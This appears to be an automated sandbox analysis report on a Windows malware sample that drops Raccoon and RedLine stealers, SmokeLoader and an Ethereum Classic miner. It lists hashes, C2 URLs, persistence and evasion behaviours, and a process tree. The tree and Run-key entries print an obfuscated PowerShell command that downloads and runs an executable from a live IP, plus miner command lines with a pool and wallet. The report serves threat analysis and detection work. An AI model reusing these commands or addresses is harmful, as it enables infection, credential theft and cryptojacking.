Analysis
- max time kernel: 150s
- max time network: 154s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 11-08-2021 19:56
- Static task: static1
- Behavioral task: behavioral1 (Sample d4537efd24d9b886648bd32b6ce4da99.exe, Resource win7v20210410)
- Behavioral task: behavioral2 (Sample d4537efd24d9b886648bd32b6ce4da99.exe, Resource win10v20210408)

General
- Target: d4537efd24d9b886648bd32b6ce4da99.exe
- Size: 207KB
- MD5: d4537efd24d9b886648bd32b6ce4da99
- SHA1: 1a014d098b8ef7ecef5ec124ddef0030c42da509
- SHA256: 5d372a19bbdae072e4fb4ff9deded30dbb40f4a74b54fbf77888a1523e864129
- SHA512: e0db39cd1165f6d34e33f4a31e71a1ff69f48cf3baf291cf873b91954e608b89dd8a89a4f1cafa279936cf22abf4e901290816d649bcbc143e7977618d6e30e4
Malware Config
- Extracted: http://91.241.19.52/Api/GetFile2
- Extracted: smokeloader, version 2020 (C2 URL list)
- Extracted: raccoon, 2ca2376c561d1af7f8b9e6f3256b06220a3db187, url4cnc: https://telete.in/johnyes13
- Extracted: raccoon, cd8dc1031358b1aec55cc6bc447df1018b068607, url4cnc: https://telete.in/jagressor_kz
- Extracted: raccoon, 471c70de3b4f9e4d493e418d1f60a90659057de0, url4cnc: https://telete.in/p1rosto100xx
Signatures

Process spawned unexpected child process (5 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4952 | 2752 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4976 | 2752 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2688 | 2752 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5028 | 2752 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 716 | 2752 | schtasks.exe
Raccoon Stealer Payload (6 IoCs)
resource | yara_rule
behavioral2/memory/1344-196-0x00000000048F0000-0x0000000004983000-memory.dmp | family_raccoon
behavioral2/memory/1344-197-0x0000000000400000-0x0000000002CB1000-memory.dmp | family_raccoon
behavioral2/memory/2728-201-0x0000000004900000-0x0000000004991000-memory.dmp | family_raccoon
behavioral2/memory/2728-203-0x0000000000400000-0x0000000002CB0000-memory.dmp | family_raccoon
behavioral2/memory/4184-261-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
behavioral2/memory/4184-268-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (4 IoCs)
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\28A9.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\28A9.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\4675.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\4675.exe | family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.

Suspicious use of NtCreateProcessExOtherParentProcess (2 IoCs)
description | pid | process | target process
PID 2732 created 1344 | 2732 | WerFault.exe | 4ADB.exe
PID 3836 created 2728 | 3836 | WerFault.exe | 4FCE.exe
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)
Blocklisted process makes network request (1 IoCs)
flow | pid | process
33 | 4124 | powershell.exe
Downloads MZ/PE file
Executes dropped EXE (53 IoCs)
process | pid(s)
1974.exe | 188
1EE4.exe | 1976, 1164
1EE4.tmp | 2300, 2064
28A9.exe | 2248
2CF0.exe | 4036
2FFE.exe | 4040, 4184
fsucenter.exe | 2836, 3884
4675.exe | 2224
Runtimebroker.exe | 2888
4ADB.exe | 1344
4FCE.exe | 2728
cheat.exe | 4636
install.exe | 4872, 4736
HostData.exe | 4924
Database.exe | 4820, 4832, 4744, 2520, 5064, 2100, 4144, 4064, 4324, 2988, 4480, 4572, 4644, 4700, 2252, 4072, 4456, 4540, 4428, 2364, 4868, 4964, 5072, 1704, 4268, 4620, 4228, 4064, 4344, 4416, 4252, 4376, 4200, 4124
Checks BIOS information in registry (2 TTPs, 64 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | process | occurrences
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Database.exe | 29
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Database.exe | 31
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 4675.exe | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 4675.exe | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 28A9.exe | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 28A9.exe | 1
Deletes itself (1 IoCs)
pid | process
2996 | (not named)
Drops startup file (1 IoCs)
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk | Runtimebroker.exe
Loads dropped DLL (1 IoCs)
pid | process
2836 | fsucenter.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\28A9.exe | themida
C:\Users\Admin\AppData\Local\Temp\28A9.exe | themida
behavioral2/memory/2248-153-0x0000000000EC0000-0x0000000000EC1000-memory.dmp | themida
C:\Users\Admin\AppData\Local\Temp\4675.exe | themida
C:\Users\Admin\AppData\Local\Temp\4675.exe | themida
behavioral2/memory/2224-183-0x0000000000EB0000-0x0000000000EB1000-memory.dmp | themida
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 6 IoCs)
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\catsrvps\\lsass.exe\"" | install.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fsucenter = "\"C:\\Users\\Admin\\AppData\\Roaming\\BI Video Controller for x86 systems\\log20210811_215406\\fsucenter.exe\"" | install.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "\"C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\resources\\ShellExperienceHost.exe\"" | install.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\regedit\\explorer.exe\"" | install.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WerFault = "\"C:\\Windows\\SysWOW64\\wcnwiz\\WerFault.exe\"" | install.exe
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled
description | ioc | process | occurrences
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Database.exe | 34
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 28A9.exe | 1
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 4675.exe | 1
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
Drops file in System32 directory (5 IoCs)
description | ioc | process
File created | C:\Windows\SysWOW64\wcnwiz\WerFault.exe | install.exe
File created | C:\Windows\SysWOW64\wcnwiz\ee201eac4591f0b16735de891f3d31be299085b8 | install.exe
File created | C:\Windows\SysWOW64\catsrvps\lsass.exe | install.exe
File opened for modification | C:\Windows\SysWOW64\catsrvps\lsass.exe | install.exe
File created | C:\Windows\SysWOW64\catsrvps\6203df4a6bafc7c328ee7f6f8ca0a8a838a8a1b9 | install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (64 IoCs)
pid | process | occurrences
2248 | 28A9.exe | 1
2224 | 4675.exe | 1
4820, 4832, 4744, 2520, 5064, 2100, 4144, 4064, 4324, 2988, 4480, 4572, 4644, 4700, 2252, 4072, 4456, 4540, 4428, 2364 | Database.exe | 3 each
4868 | Database.exe | 2
Suspicious use of SetThreadContext (3 IoCs)
description | pid | process | target process
PID 628 set thread context of 3928 | 628 | d4537efd24d9b886648bd32b6ce4da99.exe | d4537efd24d9b886648bd32b6ce4da99.exe
PID 4040 set thread context of 4184 | 4040 | 2FFE.exe | 2FFE.exe
PID 4872 set thread context of 4736 | 4872 | install.exe | install.exe
Drops file in Windows directory (4 IoCs)
description | ioc | process
File created | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\resources\f8c8f1285d826bc63910aaf97db97186ba642b4f | install.exe
File created | C:\Windows\regedit\explorer.exe | install.exe
File created | C:\Windows\regedit\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 | install.exe
File created | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\resources\ShellExperienceHost.exe | install.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash (23 IoCs)
pid (WerFault.exe) | pid_target | target process
3916, 720, 3836, 2736, 1232, 1176 | 4036 | 2CF0.exe
2744, 1336, 1144, 3960, 2980, 2860, 744 | 2888 | Runtimebroker.exe
3008, 980, 1532, 784, 2732 | 1344 | 4ADB.exe
876, 3920, 2064, 3916, 3836 | 2728 | 4FCE.exe
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | d4537efd24d9b886648bd32b6ce4da99.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | d4537efd24d9b886648bd32b6ce4da99.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | d4537efd24d9b886648bd32b6ce4da99.exe
Creates scheduled task(s) (1 TTPs, 5 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | process
5028 | schtasks.exe
716 | schtasks.exe
4952 | schtasks.exe
4976 | schtasks.exe
2688 | schtasks.exe
Modifies system certificate store
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | fsucenter.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary blob not reproduced) | fsucenter.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | process | occurrences
3928 | d4537efd24d9b886648bd32b6ce4da99.exe | 2
2996 | (not named) | 62
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid | process
2996 | (not named)
Suspicious behavior: MapViewOfSection (19 IoCs)
pid | process | occurrences
3928 | d4537efd24d9b886648bd32b6ce4da99.exe | 1
2996 | (not named) | 18
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | process | occurrences
Token: SeShutdownPrivilege | 2996 | (not named) | 28
Token: SeCreatePagefilePrivilege | 2996 | (not named) | 28
Token: SeDebugPrivilege | 2248 | 28A9.exe | 1
Token: SeRestorePrivilege | 3916 | WerFault.exe | 1
Token: SeBackupPrivilege | 3916 | WerFault.exe | 1
Token: SeDebugPrivilege | 3916, 720, 3836, 2736, 1232 | WerFault.exe | 1 each
Suspicious use of FindShellTrayWindow (3 IoCs)
pid | process
2996 | (not named)
2996 | (not named)
2064 | 1EE4.tmp
Suspicious use of SendNotifyMessage (9 IoCs)
pid | process | occurrences
2996 | (not named) | 9
Suspicious use of SetWindowsHookEx (1 IoCs)
pid | process
188 | 1974.exe
Suspicious use of UnmapMainImage (1 IoCs)
pid | process
2996 | (not named)
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | process | target process | occurrences
PID 628 wrote to memory of 3928 | 628 | d4537efd24d9b886648bd32b6ce4da99.exe | d4537efd24d9b886648bd32b6ce4da99.exe | 6
PID 2996 wrote to memory of 188 | 2996 | (not named) | 1974.exe | 3
PID 2996 wrote to memory of 1976 | 2996 | (not named) | 1EE4.exe | 3
PID 1976 wrote to memory of 2300 | 1976 | 1EE4.exe | 1EE4.tmp | 3
PID 2300 wrote to memory of 1164 | 2300 | 1EE4.tmp | 1EE4.exe | 3
PID 1164 wrote to memory of 2064 | 1164 | 1EE4.exe | 1EE4.tmp | 3
PID 2996 wrote to memory of 2248 | 2996 | (not named) | 28A9.exe | 3
PID 2996 wrote to memory of 4036 | 2996 | (not named) | 2CF0.exe | 3
PID 2996 wrote to memory of 4040 | 2996 | (not named) | 2FFE.exe | 3
PID 2064 wrote to memory of 2836 | 2064 | WerFault.exe | fsucenter.exe | 3
PID 2996 wrote to memory of 2224 | 2996 | (not named) | 4675.exe | 3
PID 4036 wrote to memory of 2888 | 4036 | 2CF0.exe | Runtimebroker.exe | 3
PID 2996 wrote to memory of 1344 | 2996 | (not named) | 4ADB.exe | 3
PID 2996 wrote to memory of 2728 | 2996 | (not named) | 4FCE.exe | 3
PID 2996 wrote to memory of 2840 | 2996 | (not named) | explorer.exe | 4
PID 2996 wrote to memory of 860 | 2996 | (not named) | powershell.exe | 3
PID 2996 wrote to memory of 3008 | 2996 | (not named) | explorer.exe | 4
PID 2888 wrote to memory of 860 | 2888 | Runtimebroker.exe | powershell.exe | 3
PID 2996 wrote to memory of 3992 | 2996 | (not named) | explorer.exe | 3
PID 2996 wrote to memory of 2860 | 2996 | (not named) | explorer.exe | 2
Processes
-
C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe
"C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe
"C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\1974.exe
C:\Users\Admin\AppData\Local\Temp\1974.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\1EE4.exe
C:\Users\Admin\AppData\Local\Temp\1EE4.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-T9LCR.tmp\1EE4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T9LCR.tmp\1EE4.tmp" /SL5="$501D6,4193427,831488,C:\Users\Admin\AppData\Local\Temp\1EE4.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1EE4.exe
"C:\Users\Admin\AppData\Local\Temp\1EE4.exe" /VERYSILENT
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-DC5KT.tmp\1EE4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DC5KT.tmp\1EE4.tmp" /SL5="$601D6,4193427,831488,C:\Users\Admin\AppData\Local\Temp\1EE4.exe" /VERYSILENT
4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\install.exe
"C:\ProgramData\Data\install.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\Data\install.exe
"C:\ProgramData\Data\install.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_215406\fsucenter.exe
"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_215406\fsucenter.exe"
8⤵
- Executes dropped EXE
-
C:\ProgramData\Systemd\HostData.exe
NULL
6⤵
- Executes dropped EXE
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\28A9.exe
C:\Users\Admin\AppData\Local\Temp\28A9.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2CF0.exe
C:\Users\Admin\AppData\Local\Temp\2CF0.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 856
2⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 912
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 840
2⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 828
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 948
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 972
2⤵
- Program crash
-
C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 732
3⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 736
3⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 776
3⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 768
3⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 984
3⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 1044
3⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 1176
3⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
